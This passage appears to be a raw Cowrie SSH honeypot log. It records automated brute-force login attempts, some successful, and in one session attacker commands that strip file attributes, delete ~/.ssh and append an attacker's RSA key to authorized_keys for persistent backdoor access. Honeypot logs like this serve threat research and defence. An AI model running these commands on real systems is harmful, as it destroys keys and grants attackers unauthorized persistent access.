{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:34:12.451644Z","src_ip":"193.32.162.145","session":"806c96770580"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:34:12.481596Z","src_ip":"193.32.162.145","session":"806c96770580"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-26T13:34:12.574100Z","src_ip":"193.32.162.145","session":"806c96770580"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:34:13.606726Z","src_ip":"193.32.162.145","session":"806c96770580"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45290,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff6762b87500","protocol":"ssh","message":"New connection: 167.99.49.89:45290 (1.2.3.4:22) [session: ff6762b87500]","sensor":"my-vps","timestamp":"2025-08-26T13:34:32.274733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:34:32.276371Z","src_ip":"167.99.49.89","session":"ff6762b87500"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:34:32.367995Z","src_ip":"167.99.49.89","session":"ff6762b87500"}
{"eventid":"cowrie.login.failed","username":"yafei","password":"123456","message":"login attempt [yafei/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:34:32.776640Z","src_ip":"167.99.49.89","session":"ff6762b87500"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:34:33.870888Z","src_ip":"167.99.49.89","session":"ff6762b87500"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52386,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f8d088ecf43","protocol":"ssh","message":"New connection: 212.227.235.229:52386 (1.2.3.4:22) [session: 2f8d088ecf43]","sensor":"my-vps","timestamp":"2025-08-26T13:34:52.254790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:34:52.888875Z","src_ip":"212.227.235.229","session":"2f8d088ecf43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:34:52.889733Z","src_ip":"212.227.235.229","session":"2f8d088ecf43"}
{"eventid":"cowrie.login.success","username":"root","password":"900000000","message":"login attempt [root/900000000] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:34:57.676577Z","src_ip":"212.227.235.229","session":"2f8d088ecf43"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:34:58.551019Z","src_ip":"212.227.235.229","session":"2f8d088ecf43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44091,"dst_ip":"1.2.3.4","dst_port":22,"session":"177ae1fb52b0","protocol":"ssh","message":"New connection: 212.227.235.229:44091 (1.2.3.4:22) [session: 177ae1fb52b0]","sensor":"my-vps","timestamp":"2025-08-26T13:35:28.371223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:35:28.373246Z","src_ip":"212.227.235.229","session":"177ae1fb52b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:35:28.600929Z","src_ip":"212.227.235.229","session":"177ae1fb52b0"}
{"eventid":"cowrie.login.failed","username":"rajesh","password":"rajesh","message":"login attempt [rajesh/rajesh] failed","sensor":"my-vps","timestamp":"2025-08-26T13:35:29.449328Z","src_ip":"212.227.235.229","session":"177ae1fb52b0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:30.660385Z","src_ip":"212.227.235.229","session":"177ae1fb52b0"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":60998,"dst_ip":"1.2.3.4","dst_port":22,"session":"926b3868964d","protocol":"ssh","message":"New connection: 167.99.49.89:60998 (1.2.3.4:22) [session: 926b3868964d]","sensor":"my-vps","timestamp":"2025-08-26T13:35:33.506898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:35:33.507865Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:35:33.598178Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.login.success","username":"root","password":"Zc123456","message":"login attempt [root/Zc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.000226Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:35:34.241152Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.241933Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.243220Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.334957Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:35:34.534523Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.535320Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.628285Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.629267Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":32780,"dst_ip":"1.2.3.4","dst_port":22,"session":"58f004f69d68","protocol":"ssh","message":"New connection: 167.99.49.89:32780 (1.2.3.4:22) [session: 58f004f69d68]","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.718879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.719781Z","src_ip":"167.99.49.89","session":"58f004f69d68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:35:34.810027Z","src_ip":"167.99.49.89","session":"58f004f69d68"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:35:35.239167Z","src_ip":"167.99.49.89","session":"58f004f69d68"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:36.331830Z","src_ip":"167.99.49.89","session":"58f004f69d68"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":32790,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a5fb65545f4","protocol":"ssh","message":"New connection: 167.99.49.89:32790 (1.2.3.4:22) [session: 3a5fb65545f4]","sensor":"my-vps","timestamp":"2025-08-26T13:35:36.421393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:35:36.422400Z","src_ip":"167.99.49.89","session":"3a5fb65545f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:35:36.513198Z","src_ip":"167.99.49.89","session":"3a5fb65545f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:35:36.917806Z","src_ip":"167.99.49.89","session":"3a5fb65545f4"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:37.010645Z","src_ip":"167.99.49.89","session":"926b3868964d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:35:37.011625Z","src_ip":"167.99.49.89","session":"3a5fb65545f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48202,"dst_ip":"1.2.3.4","dst_port":22,"session":"434333e54c77","protocol":"ssh","message":"New connection: 212.227.235.229:48202 (1.2.3.4:22) [session: 434333e54c77]","sensor":"my-vps","timestamp":"2025-08-26T13:36:02.207727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:36:02.208694Z","src_ip":"212.227.235.229","session":"434333e54c77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:36:02.441863Z","src_ip":"212.227.235.229","session":"434333e54c77"}
{"eventid":"cowrie.login.failed","username":"zx","password":"123456","message":"login attempt [zx/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:36:03.415388Z","src_ip":"212.227.235.229","session":"434333e54c77"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:36:04.650382Z","src_ip":"212.227.235.229","session":"434333e54c77"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54180,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee073bf47c2","protocol":"ssh","message":"New connection: 217.72.205.35:54180 (1.2.3.4:22) [session: aee073bf47c2]","sensor":"my-vps","timestamp":"2025-08-26T13:36:15.585897Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:36:15.587141Z","src_ip":"217.72.205.35","session":"aee073bf47c2"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"85c14e4a28e7","protocol":"ssh","message":"New connection: 167.99.49.89:36406 (1.2.3.4:22) [session: 85c14e4a28e7]","sensor":"my-vps","timestamp":"2025-08-26T13:36:35.334506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:36:35.335326Z","src_ip":"167.99.49.89","session":"85c14e4a28e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 